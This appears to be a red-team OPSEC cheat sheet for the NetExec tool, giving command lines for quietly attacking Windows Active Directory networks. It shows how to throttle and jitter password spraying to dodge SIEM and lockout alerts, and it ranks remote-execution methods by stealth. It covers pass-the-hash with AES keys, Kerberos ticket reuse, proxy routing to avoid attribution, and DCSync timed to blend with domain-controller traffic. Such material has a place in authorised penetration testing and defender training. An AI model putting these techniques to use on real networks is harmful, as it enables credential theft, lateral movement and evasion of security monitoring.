🔇 Noise Reduction — Core Controls
Jitter: Always add --jitter 5 (or higher) between requests. Random delays break timing-based detection correlations in SIEMs.
nxc smb <CIDR> -u U -p P --jitter 5
nxc smb <CIDR> -u U -p P --jitter 30
Thread Count: Default is 100 threads — extremely noisy. Drop to 5–10 on sensitive engagements. Defenders see burst auth as an immediate IOC.
nxc smb <CIDR> -u U -p P -t 5 --jitter 10
Fail Limits: Set --ufail-limit 1 or --ufail-limit 2 per user to avoid lockouts and avoid setting off lockout alerting rules.
nxc smb <t> -u users.txt -p pass.txt --ufail-limit 1 --gfail-limit 20
⚙ Execution Method — IOC Comparison
| Method | Noise Level | Artifact | Recommended |
| mmcexec | Lowest | COM object | ✓ Stealth |
| wmiexec | Low | WMI process | ✓ Good |
| atexec | Medium | Sched. Task log | ⚠ Careful |
| smbexec | HIGH | Service install + event | ✗ Avoid |
nxc smb <t> -u U -p P --exec-method mmcexec -x 'whoami'
🔑 Credential Hygiene
AES over NTLM: When doing Pass-the-Hash, prefer Overpass-the-Hash with AES256 keys via Kerberos. NTLM auth to DCs is more alarming to security teams.
nxc smb <t> -u USER --aesKey <AES256_KEY> -k
Use kcache: Reuse Kerberos tickets from ccache instead of re-authenticating with credentials each time.
export KRB5CCNAME=/tmp/admin.ccache
nxc smb <t> -u USER --use-kcache -k
🌐 Infrastructure & Routing OPSEC
Proxy Everything: Route nxc through proxychains/SOCKS to avoid attribution of scan traffic to your direct IP. Never scan from your C2 server directly.
proxychains -q nxc smb <target> -u U -p P --users
Separate IPs per action: If you run scans, phishing, and exploits from the same IP, detection of one collapses all. Use dedicated, ephemeral IPs per operation type.
DNS Ops: Use a custom DNS server to avoid leaking queries to corporate resolvers.
nxc smb <target> --dns-server 8.8.8.8 -u U -p P
🪵 Logging & Evidence Control
Log Everything Locally: Always log nxc output to a file for your own records — helps de-conflict what was done and when.
nxc smb <t> -u U -p P --users --log /tmp/enum_$(date +%F).log
nxc.conf OPSEC Warnings: NetExec warns you before running noisy actions. Do NOT globally disable these — they exist to protect you.
ignore_opsec = False
🔬 Stealth Enumeration Priorities
1. LDAP first: Prefer LDAP over SMB for all domain recon — much quieter, no SMB event logs.
2. Read before writing: Get-file, spider, enumerate before any exec or write. Each exec is a potential alert.
3. Null sessions before creds: Exhaust unauthenticated enumeration before burning credentials.
4. Target one host at a time: Scanning /24 simultaneously triggers IDS/NDR. Narrow scope = lower detection probability.
5. DCSync DC-to-DC: If replicating NTDS, route DCSync between DCs rather than from a workstation to a DC — replication between DCs is expected traffic.
📋 OPSEC Pre-Flight Checklist
nxc smb <DC> -u '' -p '' --pass-pol